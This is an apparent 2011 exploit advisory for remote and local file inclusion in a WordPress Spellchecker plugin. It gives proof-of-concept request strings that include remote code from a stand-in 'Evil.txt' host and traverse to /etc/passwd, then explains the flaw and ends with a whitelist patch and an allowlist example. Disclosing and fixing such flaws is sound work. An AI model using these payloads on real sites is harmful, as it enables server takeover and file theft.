0-day RFI & LFI in WordPress 3.1 Plugin Vulnerability RELEASED
Web References:-
http://packetstormsecurity.org/files/100297/WordPress-Spellchecker-Local-File-Inclusion-Remote-File-Inclusion.html
http://packetstorm.linuxsecurity.com/1104-exploits/wpspellchecker-rfilfi.txt
http://securityreason.com/wlb_show/WLB-2011040079
http://www.securityhome.eu/exploits/exploit.php?eid=13843116614da43163eb7a76.20091642
---------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
======++++++ RFI & LFI Wordpress Spellchecker Plugin Vulnerability ++++++======
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------------------------------------------------------
Released Date = 12/4/2011
---------------------------------------------------------------------------------
Author = Dr Trojan (www.paksecteam.com)
---------------------------------------------------------------------------------
Greets = Sacred1947 - ShozY - Shadow008 - HackerBradri - Death Angel - Yasir Fati
---------------------------------------------------------------------------------
Version = 3.1
---------------------------------------------------------------------------------
Tested On = Windows 7 & Xampp
---------------------------------------------------------------------------------
Rfi Exploit = /general.php?file=http://sitename.com/Evil.txt?
Lfi Exploit = /general.php?file=../../../../../../../etc/passwd
Root Location = wordpress/wp-includes/js/tinymce/plugins/spellchecker/includes/general.php
Web Location = www.sitename.com/general.php?file=
P.O.C:-
RFI Example = www.sitename.com/general.php?file=http://sitename.com/Evil.txt?
LFI Example = www.sitename.com/general.php?file=../../../../../../../etc/passwd
User Input = $_GET
Potentially Vulnerable Function = require
Vulnerability description:-
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability.
User tainted data is used when creating the file name that will be included into the current file.
PHP code in this file will be evaluated, non-PHP code will be embedded to the output.
This vulnerability can lead to full server compromise.
Vulnerable Example Code =
Patch for vulnerability: Build a whitelist of permitted file names. Do not only limit the file name to specific paths or extensions.
<?php $files = array("[...]php", "main.php"); if(!in_array($_GET["file"], $files)) exit; ?>
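The whitelist patch described above, written out as an added example (not code from the plugin or from the advisory's author). The request value is used only as a lookup key and never becomes part of the path passed to require; INCLUDE_DIR, the keys and the file names are hypothetical.

```php
<?php
// Added example: allowlist lookup for an include driven by a request parameter.
// INCLUDE_DIR, the keys and the file names are hypothetical, not the plugin's.

const INCLUDE_DIR = __DIR__ . '/includes';

// Accepted parameter values mapped to fixed file names chosen by the developer.
const ALLOWED_INCLUDES = [
    'main'   => 'main.php',
    'config' => 'config.php',
];

/**
 * Return the absolute path to include for $requested, or null to refuse.
 * The request value is only compared against array keys, so traversal
 * sequences and URLs can never reach require.
 */
function resolve_include($requested): ?string
{
    // Refuse arrays (?file[]=x) and anything that is not an exact key.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_INCLUDES)) {
        return null;
    }
    return INCLUDE_DIR . '/' . ALLOWED_INCLUDES[$requested];
}

// Constructed sample inputs: one legitimate value, the two request values
// shown in the advisory, and an array-typed parameter.
$samples = [
    'main',
    'http://sitename.com/Evil.txt?',
    '../../../../../../../etc/passwd',
    ['main'],
];

foreach ($samples as $value) {
    $path = resolve_include($value);
    printf("%-45s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES), $path ?? 'REFUSED');
}

// In a request handler the call would look like this:
//   $path = resolve_include($_GET['file'] ?? null);
//   if ($path === null) { http_response_code(400); exit; }
//   require $path;
```

Setting allow_url_include = Off in php.ini (the default since PHP 5.2) blocks the remote case independently of the code; it does not affect local inclusion, so the whitelist is still required.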